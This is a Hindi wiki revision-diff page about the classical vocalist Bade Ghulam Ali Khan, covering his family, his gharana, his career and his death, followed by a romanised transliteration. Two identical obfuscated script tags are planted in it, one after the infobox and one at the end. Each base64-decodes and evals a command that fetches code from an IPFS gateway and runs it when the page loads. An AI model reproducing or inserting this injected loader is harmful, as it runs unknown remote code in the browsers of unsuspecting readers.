Difference between revisions of "बड़े ग़ुलाम अली ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अविभावक" to "अभिभावक")
m (Text replacement - "कॅरियर" to "कैरियर")
Line 37: Line 37:
 
बड़े ग़ुलाम अली ख़ाँ साहब का जन्म [[2 अप्रॅल]], [[1902]] को पाकिस्तानी पंजाब के मशहूर शहर [[लाहौर]] के पास स्थित गाँव केसुर में हुआ था।<ref name="bgak">{{cite web |url=http://hindi.webdunia.com/samayik/article/article/0804/25/1080425064_1.htm |title=वेब दुनिया |accessmonthday=[[12 अक्टूबर]] |accessyear=[[2010]] |last=ओझा |first=स्वतंत्रकुमार  |authorlink= |format=एच.टी.एम.एल |publisher= |language=[[हिन्दी]] }}</ref> बड़े ग़ुलाम अली ख़ाँ ने मानसिक, शारीरिक और आध्यात्मिक शक्ति संगीत से ही प्राप्त की थी और यही कारण था कि उनके बोलचाल और हावभाव से यह ज़ाहिर हो जाता था कि यह शख़्सियत संगीत के प्रचार-प्रसार के लिए धरती पर अवतरित हुई है।<ref name="bgak"></ref> इनका परिवार संगीतज्ञों का परिवार था। इनके पिताजी का नाम '''अली बख्श ख़ाँ''' है। दिलचस्प है कि संगीत की दुनिया में उनकी शुरुआत [[सारंगी वादक]] के रूप में हुई। उन्होंने अपने पिता अली बख्श ख़ाँ और चाचा काले ख़ाँ से संगीत की बारीकियाँ सीखीं। इनके पिता महाराजा [[कश्मीर]] के दरबारी गायक थे और वह घराना "कश्मीरी घराना" कहलाता था। जब ये लोग [[पटियाला]] जाकर रहने लगे तो यह घराना "[[पटियाला घराना]]" के नाम से जाना जाने लगा। दिखने में बेहद कड़क मिज़ाज और मज़बूत डील-डौल वाले बड़े ग़ुलाम अली ने सबरंग नाम से कई बंदिशें रचीं। उनकी सरगम का अंदाज़ बिल्कुल निराला था। साल [[1947]] में भारत के विभाजन के बाद बड़े ग़ुलाम अली ख़ाँ [[पाकिस्तान]] चले गए थे लेकिन संगीत के इस उपासक को पाकिस्तान का माहौल क़तई पसंद नहीं आया। नतीजतन वह जल्द ही भारत लौट आए। <ref name="hnd"></ref>
 
बड़े ग़ुलाम अली ख़ाँ साहब का जन्म [[2 अप्रॅल]], [[1902]] को पाकिस्तानी पंजाब के मशहूर शहर [[लाहौर]] के पास स्थित गाँव केसुर में हुआ था।<ref name="bgak">{{cite web |url=http://hindi.webdunia.com/samayik/article/article/0804/25/1080425064_1.htm |title=वेब दुनिया |accessmonthday=[[12 अक्टूबर]] |accessyear=[[2010]] |last=ओझा |first=स्वतंत्रकुमार  |authorlink= |format=एच.टी.एम.एल |publisher= |language=[[हिन्दी]] }}</ref> बड़े ग़ुलाम अली ख़ाँ ने मानसिक, शारीरिक और आध्यात्मिक शक्ति संगीत से ही प्राप्त की थी और यही कारण था कि उनके बोलचाल और हावभाव से यह ज़ाहिर हो जाता था कि यह शख़्सियत संगीत के प्रचार-प्रसार के लिए धरती पर अवतरित हुई है।<ref name="bgak"></ref> इनका परिवार संगीतज्ञों का परिवार था। इनके पिताजी का नाम '''अली बख्श ख़ाँ''' है। दिलचस्प है कि संगीत की दुनिया में उनकी शुरुआत [[सारंगी वादक]] के रूप में हुई। उन्होंने अपने पिता अली बख्श ख़ाँ और चाचा काले ख़ाँ से संगीत की बारीकियाँ सीखीं। इनके पिता महाराजा [[कश्मीर]] के दरबारी गायक थे और वह घराना "कश्मीरी घराना" कहलाता था। जब ये लोग [[पटियाला]] जाकर रहने लगे तो यह घराना "[[पटियाला घराना]]" के नाम से जाना जाने लगा। दिखने में बेहद कड़क मिज़ाज और मज़बूत डील-डौल वाले बड़े ग़ुलाम अली ने सबरंग नाम से कई बंदिशें रचीं। उनकी सरगम का अंदाज़ बिल्कुल निराला था। साल [[1947]] में भारत के विभाजन के बाद बड़े ग़ुलाम अली ख़ाँ [[पाकिस्तान]] चले गए थे लेकिन संगीत के इस उपासक को पाकिस्तान का माहौल क़तई पसंद नहीं आया। नतीजतन वह जल्द ही भारत लौट आए। <ref name="hnd"></ref>
  
==कॅरियर==
+
==कैरियर==
 
[[चित्र:Bade-Ghulam-Ali-Khan-Postage-Stamp.jpg|thumb|130px|ख़ाँ साहब के सम्मान में जारी डाक टिकट]]
 
[[चित्र:Bade-Ghulam-Ali-Khan-Postage-Stamp.jpg|thumb|130px|ख़ाँ साहब के सम्मान में जारी डाक टिकट]]
 
अपने सधे हुए कंठ के कारण बड़े ग़ुलाम अली ख़ाँ ने बहुत प्रसिद्धि पाई। 1919 में लाहौर के संगीत सम्मेलन में इन्होंने अपनी कला का पहली बार सार्वजनिक प्रदर्शन किया। फिर कोलकाता और इलाहाबाद के संगीत सम्मेलनों में इन्हें देशव्यापी ख्याति प्रदान की। भारतीय संगीत के फलक पर [[1930]] के दशक में सितारे की तरह चमके इस गायक ने साल [[1938]] में तत्कालीन [[कलकत्ता]] में हुए एक कार्यक्रम में दुनिया के सामने पहली बार अपनी आवाज़ का जादू बिखेरा था। उसके बाद वह संगीत को आगे बढ़ाने और उसे समृद्ध करने की मुहिम में रम गए। ख़ाँ साहब किंवदंती गायक थे। गायन से ऐसा मोहजाल बुनते कि आपको उसमें उलझना ही है। [[मुग़ले आजम]] फ़िल्म में गाने के लिए उन्होंने एक गाने के 25 हज़ार रुपए माँग लिए थे क्योंकि वे फ़िल्म में गाना नहीं चाहते थे। निर्देशक के. आसिफ ने 25 हज़ार रुपए देना स्वीकार कर लिया जबकि उस जमाने में [[लता मंगेशकर]] और [[मुहम्मद रफ़ी]] को एक गाने के पाँच सौ रुपए से भी कम मिलते थे।<ref name="bgak"></ref> बड़े ग़ुलाम अली ख़ाँ के मुंह से एक बार ‘राधेकृष्ण बोल’ भजन सुनकर [[महात्मा गांधी]] बहुत प्रभावित हुए थे।  
 
अपने सधे हुए कंठ के कारण बड़े ग़ुलाम अली ख़ाँ ने बहुत प्रसिद्धि पाई। 1919 में लाहौर के संगीत सम्मेलन में इन्होंने अपनी कला का पहली बार सार्वजनिक प्रदर्शन किया। फिर कोलकाता और इलाहाबाद के संगीत सम्मेलनों में इन्हें देशव्यापी ख्याति प्रदान की। भारतीय संगीत के फलक पर [[1930]] के दशक में सितारे की तरह चमके इस गायक ने साल [[1938]] में तत्कालीन [[कलकत्ता]] में हुए एक कार्यक्रम में दुनिया के सामने पहली बार अपनी आवाज़ का जादू बिखेरा था। उसके बाद वह संगीत को आगे बढ़ाने और उसे समृद्ध करने की मुहिम में रम गए। ख़ाँ साहब किंवदंती गायक थे। गायन से ऐसा मोहजाल बुनते कि आपको उसमें उलझना ही है। [[मुग़ले आजम]] फ़िल्म में गाने के लिए उन्होंने एक गाने के 25 हज़ार रुपए माँग लिए थे क्योंकि वे फ़िल्म में गाना नहीं चाहते थे। निर्देशक के. आसिफ ने 25 हज़ार रुपए देना स्वीकार कर लिया जबकि उस जमाने में [[लता मंगेशकर]] और [[मुहम्मद रफ़ी]] को एक गाने के पाँच सौ रुपए से भी कम मिलते थे।<ref name="bgak"></ref> बड़े ग़ुलाम अली ख़ाँ के मुंह से एक बार ‘राधेकृष्ण बोल’ भजन सुनकर [[महात्मा गांधी]] बहुत प्रभावित हुए थे।  

Revision as of 15:02, 6 November 2015

b de gulam ali khaan
poora nam b de gulam ali khaan
janm 2 aprॅl, 1902
janm bhoomi kesur gaanv, lahaur, pakistan
mrityu 25 aprॅl, 1968
mrityu sthan haidarabad, aandhr pradesh
abhibhavak ali bakhsh khaan
karm-kshetr hindustani shastriy gayak
vishay sangit
puraskar-upadhi padm bhooshan aur sangit natak akadami puraskar
nagarikata bharatiy

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ustad b de gulam ali khaan (janm: 2 aprॅl, 1902 - mrityu: 25 aprail, 1968) ki ganana bharat ke mahanatam gayakoan v sangitajnoan mean ki jati hai. ve vilakshan madhur svar ke svami the. inake gayan ko sunakar shrota apani sudh-budh khokar kuchh samay ke lie svayan ko kho dete the. bharat ke kone-kone se sangit ke parakhi log khaan sahab ko gayan ke lie nyauta bhejate the. kya rajagharane kya mamooli skool ke vidyarthi, khaan sahab ki makhamali avaz sabhi ko mantramugdh kar deti thi.[1] dil ko chhoo jane vali avaz ke malik ustad b de gulam ali khaan ne naveli shaili ke zarie thumari ko nee ab aur tab di. janakaroan ke mutabik ustad ne apane prayogadharmi sangit ki badaulat thumari ko jani-pahachani shaili ki simaoan se bahar nikala.[2]

jivan parichay

b de gulam ali khaan sahab ka janm 2 aprॅl, 1902 ko pakistani panjab ke mashahoor shahar lahaur ke pas sthit gaanv kesur mean hua tha.[3] b de gulam ali khaan ne manasik, sharirik aur adhyatmik shakti sangit se hi prapt ki thi aur yahi karan tha ki unake bolachal aur havabhav se yah zahir ho jata tha ki yah shakhsiyat sangit ke prachar-prasar ke lie dharati par avatarit huee hai.[3] inaka parivar sangitajnoan ka parivar tha. inake pitaji ka nam ali bakhsh khaan hai. dilachasp hai ki sangit ki duniya mean unaki shuruat sarangi vadak ke roop mean huee. unhoanne apane pita ali bakhsh khaan aur chacha kale khaan se sangit ki barikiyaan sikhian. inake pita maharaja kashmir ke darabari gayak the aur vah gharana "kashmiri gharana" kahalata tha. jab ye log patiyala jakar rahane lage to yah gharana "patiyala gharana" ke nam se jana jane laga. dikhane mean behad k dak mizaj aur mazaboot dil-daul vale b de gulam ali ne sabarang nam se kee bandishean rachian. unaki saragam ka aandaz bilkul nirala tha. sal 1947 mean bharat ke vibhajan ke bad b de gulam ali khaan pakistan chale ge the lekin sangit ke is upasak ko pakistan ka mahaul qatee pasand nahian aya. natijatan vah jald hi bharat laut ae. [2]

kairiyar

thumb|130px|khaan sahab ke samman mean jari dak tikat apane sadhe hue kanth ke karan b de gulam ali khaan ne bahut prasiddhi paee. 1919 mean lahaur ke sangit sammelan mean inhoanne apani kala ka pahali bar sarvajanik pradarshan kiya. phir kolakata aur ilahabad ke sangit sammelanoan mean inhean deshavyapi khyati pradan ki. bharatiy sangit ke phalak par 1930 ke dashak mean sitare ki tarah chamake is gayak ne sal 1938 mean tatkalin kalakatta mean hue ek karyakram mean duniya ke samane pahali bar apani avaz ka jadoo bikhera tha. usake bad vah sangit ko age badhane aur use samriddh karane ki muhim mean ram ge. khaan sahab kianvadanti gayak the. gayan se aisa mohajal bunate ki apako usamean ulajhana hi hai. mugale ajam film mean gane ke lie unhoanne ek gane ke 25 hazar rupe maang lie the kyoanki ve film mean gana nahian chahate the. nirdeshak ke. asiph ne 25 hazar rupe dena svikar kar liya jabaki us jamane mean lata mangeshakar aur muhammad rafi ko ek gane ke paanch sau rupe se bhi kam milate the.[3] b de gulam ali khaan ke muanh se ek bar ‘radhekrishna bol’ bhajan sunakar mahatma gaandhi bahut prabhavit hue the.

samman

khaan sahab ko bharat sarakar ke padm bhooshan aur sangit natak akadami samman se bhi navaza gaya hai.

mrityu

haidarabad ke navab jahirayarajang ke bashirabag mahal mean chaandani aur resham ki shobha vali ustad b de gulam ali khaan ki avaz 25 aprail, 1968 ko so gee aur bite yug ke patiyala gharane ka ek surila episod samapt ho gaya.[3]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi zen (hindi) (ech.ti.em.el). . abhigaman tithi: 12 aktoobar, 2010.
  2. 2.0 2.1 laiv hindustan (hindi) (ech.ti.em.el). . abhigaman tithi: 12 aktoobar, 2010.
  3. 3.0 3.1 3.2 3.3 ojha, svatantrakumar. veb duniya (hindi) (ech.ti.em.el). . abhigaman tithi: 12 aktoobar, 2010.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>